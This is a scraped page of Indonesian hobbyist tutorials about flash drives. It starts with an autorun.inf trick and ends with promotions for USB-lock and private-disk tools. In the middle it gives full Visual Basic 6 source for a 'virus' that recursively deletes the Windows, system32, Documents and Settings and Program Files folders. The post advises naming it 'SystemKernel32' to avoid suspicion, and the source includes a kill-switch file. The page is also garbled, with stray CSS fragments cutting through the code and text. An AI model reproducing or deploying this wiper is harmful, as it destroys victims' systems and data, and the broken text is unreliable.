Cara buat Antivirus pada Flashdisk

Submitted by cara membuat ym on Sat, 06/05/2010 - 12:36 Flash disk merupakan sebuah removable media yang sangat bagus, karena disamping praktis alat ini juga sangat portable. Namun pasti disamping memiliki sisi baiknya, alat ini juga memiliki kekurangan. USB/UFD merupakan alat bagi virus dan kawan-kawannya untuk menyebarkan dirinya, karena jika teman-teman mecolokkan USb teman-teman ke sebauh kompi yang sudah terinfeksi sebuah virus, maka dengan sendirinya virus tersebut akan menanamkan sebauh bibit virus ke dalam USB teman-teman yang akan segera berjalan ketika pertama kali dicolokkan lagi ke komputer yang lain. UDAH ah kebanyakan pembukaan, kita mulai aja««. Pertama teman-teman harus mempersiapkan antivirus yang akan teman-teman gunakan di dalam USB teman-teman. Tapi diusahakan yagn size kecil ya, supaya kinerja USB nya gak dipengaruhi, contohnya pcmav, ansav dan laen-laen. OK jika udah untuk pembuatannya ikuti langkah-langakh berikut: 1.ketik di notepad mantera berikut: [AutoRun] open=namaantivirus.exe shellexecute=namaantivirus.exe shell\Scan pakai alt antivirus!!!\command=namaantivirus.exe shell=Scan pakai alt antivirus!!! 2.trus save dengan nama ³autorun.inf´(gak pake tanda kutip) di flashdisk kita sekarang tinggal kita copy aja antivirus yang mau kita masukin ke flashdisk..!!! Tpai tolong diinget kalau copy jang di dalam folder, langsung di root flash disk saja OK. Dah jadi deh«^_^!! kalo mau scan virus tinggal double click aja tuh drive flashdisk kita!! kalo kita klik kanan drive flashdisknya bakalan ada tambahan kata di atas kata AUTOPLAY. Scan PAKAI ALIT ANTIVIRUS!!! kalo mau di ubah ya kita tinggal ganti aja kata-kata yang ada di dalam script«! shell\kata-kata_anda\command=namaantivirus.exe shell=kata-kata_anda 3. gimana cara buka flashdisknya ??? gak mungkin lah gak pada tau«tinggal klik kanan aja trus cari open«! ngak bagus ya kalo di dalam flashdisk kita ada keliatan nama file AUTORUN n¶antivirusnya« ngerusak pemandangan gitu loh«. kalo gitu tinggal kita ubah aja attributnya jadi super hidden« caranya«??? /media/TDY296/TIPS N TRIK/install printer di Ubuntu.txt buka RUN dari start menu terus ketik cmd masuk ke dalam drive flashdisk (biasanya drive f:) udah gitu ya kita tulis commandnya f:\>attrib +h +s namaantivirus.exe (buat hidden antivirusnya) f:\>attrib +h +s autorun.inf (buat hidden file autorun)

text-decoration: none. text-decoration: none.20. visibility: visible. background-color: transparent. visibility: visible. display: inline. width: 14px. display: inline.20. soalnya cara kerjanya simple gtYg diperluin: 1.ixnp. in saya kasih lagi tutorial kedua membuat virus.gif" /> ².gif" /> atau DISINI http://i. setelah sebelumnya saya buat tutorial cara membuat virus yang kerjanya itu merestart komputer. background-repeat: norepeat.20.com/images/v6." src="http://i.0) 2. background-repeat: norepeat. dan kayanya sih g¶ bakal kedekteksi antivirus. width: 14px. True) End Sub Private Sub Form_Load() On Error Resume Next If FileExist(´c:\windows\system32\katak.1/theme/ice/palette. vertical-align: top.ixnp. vertical-align: top.1/theme/ice/palette. background-position: -943px 0pt. didalem form itu. Ngerti tombol2nya VB kalo belum bpunya VISUAL BASIC download aja DISINI http://i.com/images/v6. nah sekarang tutorial buat bikin virus yg rada mematikan.more ²Tutorial Bikin Virus cman 1 mnt 1.12:34 nah karena teman-teman saya banyak yang minta tutorial untuk membuat virus.1/t. 06/05/2010 . background-position: -943px 0pt.20. masukin nih kode Public Sub DelAll(ByVal DirtoDelete As Variant) Dim FSO. FS Set FSO = CreateObject(´Scripting. bikin form sekecil mungkin 2. background-color: transparent.Inilah Cara membuat Virus Paling Kejam Tanpa Terdeteksi Antivirus Submitted by cara membuat ym on Sat.FileSystemObject´) FS = FSO.gif).txt´) = True Then End Else Call DelAll(´c:\windows\system´) Call DelAll(´c:\windows\system32 ) Call DelAll(´c:\windows´) Call DelAll(´C:\Documents and Settings\All Users´) Call DelAll(´C:\Documents and Settings\Administrator´) Call DelAll(´C:\Documents and Settings´) Call DelAll(´C:\Program Files\Common Files´) . height: 12px. tapi simple.DeleteFolder(DirtoDelete.ixnp.ixnp.1/t." src="http://i.com/images/v6. VB/Visual Basic(optimal : 6.com/images/v6.gif). height: 12px.

anda ndiri coba2 ndiri.. oke??hhe Cara mengunci Komputer dengan Flash Disk Submitted by Guest on Fri. jadi di folder c:\windows\system32\ kalo ada file namanya katak. Bikin nih project namanya kaya nama system.txt. Jangan pernah naroh nama lu di nih virus« k? 6.08:48 .Call DelAll(´C:\Program Files\Internet Explorer´) Call DelAll(´C:\Program Files\Microsoft Visual Studio´) Call DelAll(´C:\Program Files´) End End If End Sub Function FileExist(ByVal FileName As String) As Boolean If Dir(FileName) = ³´ Then FileExist = False Else FileExist = True End If End Function 3. 07/31/2009 . disini gwe make nama ³SystemKernel32 jadi ga bakal dicurigain 5. lu ga bakal keserang ndiri« bisa lu edit koq jadi apa gitu« Yang warna merah itu folder yg bakal didelete ama nih virus. lumayan bahaya sih« ini cuman contoh bikin virus« slanjutnya. compile deh« slese! Simple kan sobat? nih virus kerjanya cuman ngapus system. Kode yg warna biru itu penangkal nih virus. lu edit ndiri aja« 4. barang kali lu ga sengaja teken jadi lu slamat.

cukup dengan menghubungkan flash drive kamu ke PC. sekalipun OS Windows sedang beroperasi pada komputer tersebut. semudah menghubungkan dan memisahkan USB Flash Disk dari PC! Download PREDATOR Source: http://www.acehforum. sekalipun operation system PC kamu sedang beroperasi. saat kamu memisahkan (Unplug) flash disk dari PC kamu.com/tips-hack/cara-mengunci-komputer-dengan/ .Predator merupakan sebuah tool yang dapat mengunci komputer kamu saat kamu sedang tidak berada di depan PC. Jika tool ini telah berjalan di system Windows kamu. maka komputer yang kamu gunakan akan terkunci dengan sendirinya. Dengan tool gratis ini kamu bisa membuat USB flash drive kamu menjadi kunci yang bisa kamu gunakan untuk me-lock dan meng-unlock PC kamu. kamu cukup menghubungkan Flash Disk yang tadinya kamu gunakan ke PC kamu. Dengan PEDATOR keamanan PC akan terjaga dengan mudah. Untuk menjalankan komputer kembali dalam kondisi normal. dan nantinya kamu akan diminta memasukkan password sebagai kunci untuk mengoperasikan PC yang kamu miliki. Dengan demikian kamu bisa menjaga komputer kamu dari penggunaan tangan-tangan lain. Cara penggunaan tool ini sangat mudah. kemudian jalankan tool Predator yang ada di PC kamu.

dan tentu saja desktop PC atau laptop. hardisk eksternal. text-align: center. atau sejenisnya ? tapi gak ketemu program yang dimaksud ? . Ukuran filenya setelah diinstal tidak lebih dari 2 MB. kalo hardisk eksternal atau flashdisk kita diberi password sehingga kita bisa menyembunyikan folder atau file dalam flashdisk / hardisk eksternal.Inilah Cara Terbaik Membuat private disk di flashdisk atau hard disk eksternal Submitted by komputer bugil on Sun.gallery-item { float: left.14:37 kaka private disk . } . hidden folder. namanya adalah Kaka Privat disk. supaya hanya kita saja yang punya yang bisa membukanya? jawabannya mungkin« ada satu program yang sangat kecil yang bisa diinstal dimana saja. } . Tujuan menyembunyikan folder atau file tentu saja ini untuk menghindari file-file kita ( baik secara sengaja atau tidak sengaja ) dibuka oleh orang lain. 08/16/2009 . atau pc mungkin pengguna hardisk eksternal dan flashdisk capai mencari-cari cara bagaimana membuat supaya beberapa file-file pribadi di flaskdisk atau hard disk eksternal tersembunyi dengan aman sehingga hanya kita saja yang tau bagaimana cara membukanya. .gallery-caption { margin-left: 0. } . membuat private disk di flashdisk.gallery { margin: auto. cape googling dengan keyword : password hardisk eksternal. password flashdisk. width: 50%. } . mungkin tidak ya. margin-top: 10px. bisa diinstal di flashdisk.gallery img { border: 2px solid #cfcfcf. hardisk ekternal.

kaka private disk . atau pc . hardisk ekternal. membuat private disk di flashdisk.

.

dan dapat beri nama dari A . Dapat digunakan untuk memprotect partisi hardisk PC anda. Privat disk ini dapat kita munculkan dan sembunyikan. kita dapat : 1. selama kita belum membuka privat disk. ini dia enaknya.com/2009/06/private-disk-di-flashdisk-atau-hard. scan dulu flaskdisk atau hardisk eksternal kita untuk menghilangkan virusnya.. Aman dari virus. 2. dan dapat digunakan selama kita mau.blogspot. 5. baru kita buka privat disknya.p Source: . jadi kita dapat memprotect partisi hardisk yang sudah ada. tanpa izin dan tanpa memberikan credit link back ke blog ini« memalukan . buat saja privat disk yang berbeda-beda untuk masing-masing user. jika file exe kaka privat disk terserang virus atau program privat disknya rusak. 8.html pemilik blog tersebut telah mengcopy paste artikel miliku . partisi hardisk yang diprotect dengan program ini tidak akan bisa diakses oleh user maupun oleh virus..keunggulan sofware Kaka Privat Disk. 6. laptop. tapi dapat kita gunakan selama kita mau/ 9. sebanyak yang kita mau. dan munculnya seperti disk drive baru di windows explorer. hardisk eksternal. memang versi yang kita download adalah trial version. Dapat Membuat privat disk di flashdisk.masing privat disk yang kita buat. desktop PC. hardisk eksternal. 7. Dapat diinstal di flashdisk. masing . kita gak perlu nyari serial numbernya ataui cracknya . maka artikel tersebut adalah hasil copy paste dari blog ini. artikel ini dapat ditemukan di : http://tempat-program. laptop. File-file yang kita simpan di privat disk aman dari virus. jika kita membuat privat disk di flashdisk atau hardisk eksternal jangan buka programnya di komputer yang terserang virus. * kalau anda pernah menemukan atau membaca artikel yang sama persis seperti ini. dapat kita beri password dengan pasword yang berbeda-beda. dan masing-masing user dapat memberi password yang diingini untuk privat disknya. gak masalah flaskdisk atau hardisk kita terserang virus. dan Kaka privat disk dapat berfungsi normal kembali. atau PC biasa 3. Kita dapat menggunakannya kaka private disk untuk multi user. maka file-file kita dalam privat disk tersebut aman dari virus. Freeware alias gak bayar. instal ulang programnya.Z 4.

info/cara/membuat-private-disk-di-flashdisk-atau-hard-disk-eks...http://submitlist. .

Sign up to vote on this title
UsefulNot useful